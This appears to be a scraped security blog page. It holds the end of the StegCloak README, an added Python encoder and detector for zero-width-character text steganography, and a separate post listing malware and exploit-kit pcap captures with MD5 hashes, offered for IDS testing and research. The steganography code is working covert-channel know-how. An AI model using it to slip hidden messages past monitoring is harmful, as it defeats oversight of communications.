-o, --output <output> Stream the secret to an output file
-h, --help display help for command
API Usage
const StegCloak = require('stegcloak');
const stegcloak = new StegCloak(true, false); // Initializes with encryption true and hmac false for hiding
// These arguments are used only during hide
// Can be changed later by switching boolean flags for stegcloak.encrypt and stegcloak.integrity
What's HMAC and do I need it?
HMAC is an additional fingerprint security step taken towards tampering of texts and to verify if the message received was actually sent by the intended sender. If the data is sent through WhatsApp, Messenger or any social media platform, this is already taken care of! However, if you are using StegCloak in your program to safely transmit and retrieve, this option can be enabled and StegCloak takes care of it.
Hide
stegcloak.hide(secret,password,cover) -> string
const magic = stegcloak.hide("Voldemort is back", "mischief managed", "The WiFi's not working here!");
// Uses stegcloak.encrypt and stegcloak.integrity booleans for obfuscation
console.log(magic); // The WiFi's not working here!
Reveal
stegcloak.reveal(data, password) -> string
const secret = stegcloak.reveal(magic, "mischief managed");
// Automatically detects if encryption or integrity checks were done during hide and acts accordingly
console.log(secret); // Voldemort is back
Important
StegCloak doesn't solve the Alice-Bob-Warden problem; it is powerful only when nobody is looking for it, and its invisibility across the web helps you achieve exactly that. It can safely be used for watermarking in forums, invisible tweets, IRC chats, social media etc. Please don't use it when you know someone is actively sniffing your data and looking at the Unicode characters with an analysis tool: even though the encoded secret cannot be deciphered, the warden (man-in-the-middle) now knows that some secret communication took place, because he would have noticed an unusual amount of invisible characters.
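Added example, not StegCloak's own code: a minimal zero-width text steganography encoder/decoder (2 bits per character over four zero-width code points, without the compression, AES-256-CTR encryption and HMAC layers StegCloak adds on top of the same idea), together with the warden-side count from the warning above, which shows why the scheme is invisible to readers but not to anyone inspecting the Unicode content. The four code points and the detection threshold are assumptions made for this demo.

```python
"""Zero-width-character text steganography plus the warden-side check described
above. Added example; not StegCloak's code, and without its compression,
encryption and HMAC layers."""

# Four zero-width code points, each carrying a 2-bit symbol (assumption for the
# demo; StegCloak uses a different, 7-character alphabet).
ZW = ["\u200b", "\u200c", "\u200d", "\u2060"]  # ZWSP, ZWNJ, ZWJ, WORD JOINER
ZW_SET = set(ZW)


def hide(secret, cover):
    """Encode secret as UTF-8, four zero-width symbols per byte, and splice the
    payload in after the first word of cover. The visible text is unchanged."""
    if any(c in ZW_SET for c in cover):
        raise ValueError("cover already contains zero-width characters")
    payload = "".join(ZW[(b >> shift) & 3]
                      for b in secret.encode("utf-8")
                      for shift in (6, 4, 2, 0))
    head, sep, tail = cover.partition(" ")
    return head + payload + sep + tail


def reveal(text):
    """Collect the zero-width characters, regroup them into bytes, decode UTF-8."""
    symbols = [ZW.index(c) for c in text if c in ZW_SET]
    if len(symbols) % 4:
        raise ValueError("truncated payload")
    data = bytes((symbols[i] << 6) | (symbols[i + 1] << 4) | (symbols[i + 2] << 2) | symbols[i + 3]
                 for i in range(0, len(symbols), 4))
    return data.decode("utf-8")


def visible(text):
    """What a human reader sees: the text with every zero-width character dropped."""
    return "".join(c for c in text if c not in ZW_SET)


def warden_check(text, max_ratio=0.01):
    """What a warden looking at the Unicode content sees. Ordinary text has
    essentially no zero-width characters (ZWJ does occur inside some emoji
    sequences, hence the small tolerance, an assumption), so a noticeable share
    of them betrays the channel even if the payload itself is encrypted."""
    total = len(text)
    zero_width = sum(1 for c in text if c in ZW_SET)
    ratio = zero_width / total if total else 0.0
    return {"zero_width": zero_width, "ratio": ratio,
            "suspicious": zero_width > 0 and ratio > max_ratio}


if __name__ == "__main__":
    cover = "The WiFi's not working here!"
    magic = hide("Voldemort is back", cover)
    print(repr(visible(magic)), "->", reveal(magic))
    print(warden_check(cover), warden_check(magic))
```

The last print is the whole point of the warning: the cover sentence carries 68 invisible characters for a 17-byte secret, a ratio no analysis tool will miss, even though nothing in the visible text changed.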
Resources
The following papers were referred to for insight and understanding of using Zero Width Characters in steganography.
- Milad Taleby Ahvanooey, Qianmu Li, Jun Hou, Ahmed Raza Rajput and Chen Yini: Modern Text Hiding, Text Steganalysis, and Applications: A Comparative Analysis
- Milad Taleby Ahvanooey, Qianmu Li, Jun Hou, Hassan Dana Mazraeh and Jing Zhang: AITSteg: An Innovative Text Steganography Technique for Hidden Transmission of Text Message via Social Media. IEEE Access
Acknowledgements
The StegCloak logo was designed by Smashicons.
via KitPloit
This article is the property of Tenochtitlan Offensive Security. See it in full --> https://tenochtitlan-sec.blogspot.com
Collection Of Pcap Files From Malware Analysis
Update: Feb 19. 2015
We have been adding pcaps to the collection so remember to check out the folder ( Pcap collection) for the recent pcaps.
I had a project to test some malicious and exploit pcaps and collected a lot of them (almost 1000) from various public sources. You can see them in the PUBLIC folder. The credits go to the authors of the pcaps listed in the name of each file. Please visit their blogs and sites to see more information about the pcaps, see their recent posts, and send them thanks. The public pcaps have no passwords on them.
Update:Dec 13. 2014
Despite rare updates of this post, we have been adding pcaps to the collection so remember to check out the folder ( Pcap collection (New link)) for the recent pcaps!
Update:Dec 31. 2013 - added new pcaps
I did some spring cleaning yesterday and came up with these malware and exploit pcaps. Such pcaps are very useful for IDS and signature testing and development, general education, and malware identification. There are some online public sandboxes offering pcaps for download, like Cuckoo or Anubis, but looking for them is tedious and you cannot be totally sure the pcap is for the malware family supposedly analysed; in other words, if the sandbox says it is Zeus that does not necessarily mean it is.
I found some good pcap repositories here (http://www.netresec.com/?page=PcapFiles) but there are very few pcaps from malware.
These are from identified and verified (to the best of my knowledge and belief - email me if you find errors) malware samples.
All of them show the first stage with the initial callback and most have the DNS requests as well. A few pcaps show extended malware runs (e.g. purplehaze pcap is over 500mb).
Most pcaps are mine, a few are from online sandboxes, and one is borrowed from malware.dontneedcoffee.com. That said, I can probably find the corresponding samples for all that have MD5 listed if you really need them. Search contagio, some are posted with the samples.
Each file has the following naming convention:
BIN [RTF, PDF] - the filetype of the dropper used, malware family name, MD5, and year+month of the malware analysis.
I will be adding more pcaps in the future. Please donate your pcaps from identified samples, I am sure many of you have.
Thank you
Download
All pcap archives have the same password (same scheme); email me if you need it. I tried posting them without any password and with the password 'infected', but they get flagged as malware. Modern AV rips through zips, and zips with the password 'infected', with ease.
APT PCAPS
- 2012-12-31 BIN_Xinmic_8761F29AF1AE2D6FACD0AE5F487484A5-pcap
- 2013-09-08 BIN_TrojanPage_86893886C7CBC7310F7675F4EFDE0A29-pcap
- 2013-09-08 BIN_Darkcomet_DC98ABBA995771480AECF4769A88756E-pcap
- 2013-09-02 8202_tbd_ 6D2C12085F0018DAEB9C1A53E53FD4D1-pcap
- 2013-09-02 BIN_8202_6d2c12085f0018daeb9c1a53e53fd4d1-pcap
- 2013-09-02 BIN_Vidgrab_6fd868e68037040c94215566852230ab-pcap
- 2013-09-02 BIN_PlugX_2ff2d518313475a612f095dd863c8aea-pcap
- 2013-09-02 BIN_Taidoor_46ef9b0f1419e26f2f37d9d3495c499f-pcap
- 2013-09-02 BIN_Vidgrab_660709324acb88ef11f71782af28a1f0-pcap
- 2013-09-02 BIN_Gh0st-gif_f4d4076dff760eb92e4ae559c2dc4525-pcap.zip
- 2013-07-15 BIN_Taleret.E_5328cfcb46ef18ecf7ba0d21a7adc02c.pcap
- 2013-05-14 BIN_Mediana_0AE47E3261EA0A2DBCE471B28DFFE007_2012-10.pcap
- 2013-05-14 BIN_Hupigon_8F90057AB244BD8B612CD09F566EAC0C
- 2013-05-14 BIN_LetsGo_yahoosb_b21ba443726385c11802a8ad731771c0_2011-07-19
- 2013-05-13 BIN_IXESHE_0F88D9B0D237B5FCDC0F985A548254F2-2013-05-pcap
- 2013-05-06 BIN_DNSWatch_protux_4F8A44EF66384CCFAB737C8D7ADB4BB8_2012-11-pcap
- 2013-05-06 BIN_9002_D4ED654BCDA42576FDDFE03361608CAA_2013-01-30-pcap
- 2013-05-06 BIN_BIN_RssFeeder_68EE5FDA371E4AC48DAD7FCB2C94BAC7-2012-06-pcap (not a common name, see the traffic ssheet http://bit.ly/maltraffic )
- 2013-04-30 BIN_MSWab_Yayih_FD1BE09E499E8E380424B3835FC973A8_us-pcap
- 2013-04-29 BIN_LURK_AF4E8D4BE4481D0420CCF1C00792F484_20120-10-pcap
- 2013-04-29 BIN_XTremeRAT_DAEBFDED736903D234214ED4821EAF99_2013-04-13-pcap
- BIN_Enfal_Lurid_0fb1b0833f723682346041d72ed112f9_2013-01.pcap
- BIN_Gh0st_variant-v2010_B1D09374006E20FA795B2E70BF566C6D_2012-08.pcap
- BIN_Likseput_E019E37F19040059AB5662563F06B609_2012-10.pcap
- BIN_Nettravler_1f26e5f9b44c28b37b6cd13283838366.pcap
- BIN_Nettravler_DA5832657877514306EDD211DEF61AFE_2012-10.pcap
- BIN_Sanny-Daws_338D0B855421867732E05399A2D56670_2012-10.pcap
- BIN_Sofacy_a2a188cbf74c1be52681f998f8e9b6b5_2012-10.pcap
- BIN_Taidoor_40D79D1120638688AC7D9497CC819462_2012-10.pcap
- BIN_TrojanCookies_840BD11343D140916F45223BA05ABACB_2012_01.pcap
- PDF_CVE-2011-2462_Pdf_2011-12.pcap
- RTF_Mongall_Dropper_Cve-2012-0158_C6F01A6AD70DA7A554D48BDBF7C7E065_2013-01.pcap
- OSX_DocksterTrojan.pcap
CRIMEWARE PCAPS
- 2013-11-12_BIN_ChePro_2A5E5D3C536DA346849750A4B8C8613A-1.pcap
- 2013-10-15_BIN_cryptolocker_9CBB128E8211A7CD00729C159815CB1C.pcap
- 2013-09-20_BIN_Lader-dlGameoverZeus_12cfe1caa12991102d79a366d3aa79e9.pcap
- 2013-09-08 BIN_Tijcont_845B0945D5FE0E0AAA16234DC21484E0-pcap
- 2013-09-08 BIN_Kelihos_C94DC5C9BB7B99658C275B7337C64B33-pcap.zip
- 2013-08-19 BIN_Nitedrem_508af8c499102ad2ebc1a83fdbcefecb-pcap
- 2013-08-17 BIN_sality_CEAF4D9E1F408299144E75D7F29C1810-pcap
- 2013-08-15 BIN_torpigminiloader-pcap.zip
- 2013-13-08 EK_popads_109.236.80.170_2013-08-13.pcap
- 2013-11-08 BIN_Alinav5.3_4C754150639AA3A86CA4D6B6342820BE.pcap
- 2013-08-08 BIN_BitcoinMiner_F865C199024105A2FFDF5FA98F391D74-pcap
- 2013-08-07 BIN_ZeroAccess_Sirefef_C2A9CCC8C6A6DF1CA1725F955F991940_2013-08-pcap
- 2013-07-05 BIN_Kuluoz-Asprox_9F842AD20C50AD1AAB41F20B321BF84B
- 2013-05-31 Wordpress-Mutopy_Symmi_20A6EBF61243B760DD65F897236B6AD3-2pcap.pcap
- 2013-05-15 BIN_Zeus_b1551c676a54e9127cd0e7ea283b92cc-2012-04.pcap
- 2013-05-15 BIN_Gypthoy_3EE49121300384FF3C82EB9A1F06F288-2013-05.pcap
- 2013-05-12 BIN_PassAlert_B4A1368515C6C39ACEF63A4BC368EDB2-2013-05-13
- 2013-05-12 BIN_HorstProxy_EFE5529D697174914938F4ABF115F762-2013-05-13-pcap
- 2013-05-12 BIN_Bitcoinminer_12E717293715939C5196E604591A97DF-2013-05-12-pcap
- 2013-05-07 BIN_ZeroAccess_Sirefef_29A35124ABEAD63CD8DB2BBB469CBC7A_2013-05-pcapc
- 2013-05-05 BIN_PowerLoader_4497A231DA9BD0EEA327DDEC4B31DA12_2013-05-pcap
- 2013-05-05 BIN_GameThief_ECBA0FEB36F9EF975EE96D1694C8164C_2013-03-pcap
- 2013-05-05 BIN_PowerLoader_4497A231DA9BD0EEA327DDEC4B31DA12_2013-05-pcap
- 2013-04-27 EK_BIN_Blackhole_leadingto_Medfos_0512E73000BCCCE5AFD2E9329972208A_2013-04-pcap
- 2013-04-26 -- BIN_Citadel_3D6046E1218FB525805E5D8FDC605361-2013-04-samp
- BIN_CitadelPacked_2012-05.pcap
- BIN_CitadelUnpacked_2012-05.pcap
- BIN_Cutwail_284Fb18Fab33C93Bc69Ce392D08Fd250_2012-10.pcap
- BIN_Darkmegi_2012-04.pcap
- BIN_DarknessDDoS_v8g_F03Bc8Dcc090607F38Ffb3A36Ccacf48_2011-01.pcap-
- BIN_dirtjumper_2011-10.pcap
- BIN_DNSChanger_2011-12.pcap
- BIN_Drowor_worm_0f015bb8e2f93fd7076f8d178df2450d_2013-04.pcap
- BIN_Googledocs_macadocs_2012-12.pcap
- BIN_Imaut_823e9bab188ad8cb30c14adc7e67066d.pcap
- BIN_IRCbot_c6716a417f82ccedf0f860b735ac0187_2013-04.pcap
- BIN_Kelihos_aka_Nap_0feaaa4adc31728e54b006ab9a7e6afa.pcap
- BIN_LoadMoney_MailRu_dl_4e801b46068b31b82dac65885a58ed9e_2013-04 .pcap
- BIN_purplehaze-2012-01.pcap
- BIN_ponyloader_470a6f47de43eff307a02f53db134289.pcap
- BIN_Ramnitpcap_2012-01.pcap
- BIN_Reedum_0ca4f93a848cf01348336a8c6ff22daf_2013-03.pcap
- BIN_SpyEye_2010-02.pcap
- BIN_Stabuniq_F31B797831B36A4877AA0FD173A7A4A2_2012-12.pcap
- BIN_Tbot_23AAB9C1C462F3FDFDDD98181E963230_2012-12.pcap
- BIN_Tbot_2E1814CCCF0C3BB2CC32E0A0671C0891_2012-12.pcap
- BIN_Tbot_5375FB5E867680FFB8E72D29DB9ABBD5_2012-12.pcap
- BIN_Tbot_A0552D1BC1A4897141CFA56F75C04857_2012-12.pcap
- BIN_Tbot_FC7C3E087789824F34A9309DA2388CE5_2012-12.pcap
- BIN_Tinba_2012-06.pcap
- BIN_Vobfus_634AA845F5B0B519B6D8A8670B994906_2012-12.pcap
- BIN_Xpaj_2012-05.pcap
- BIN_ZeroAccess_3169969E91F5FE5446909BBAB6E14D5D_2012-10.pcap
- BIN_ZeusGameover_2012-02.pcap
- BIN_Zeus_2010-12.pcap
- EK_Blackholev1_2012-03.pcap
- EK_Blackholev1_2012-08.pcap
- EK_Blackholev2_2012-09.pcap
- EK_Blackhole_Java_CVE-2012-4681_2012-08.pcap
- EK_Phoenix_2012-04.pcap
- EK_Smokekt150(Malwaredontneedcoffee)_2012-09.pcap - credit malware.dontneedcoffee.com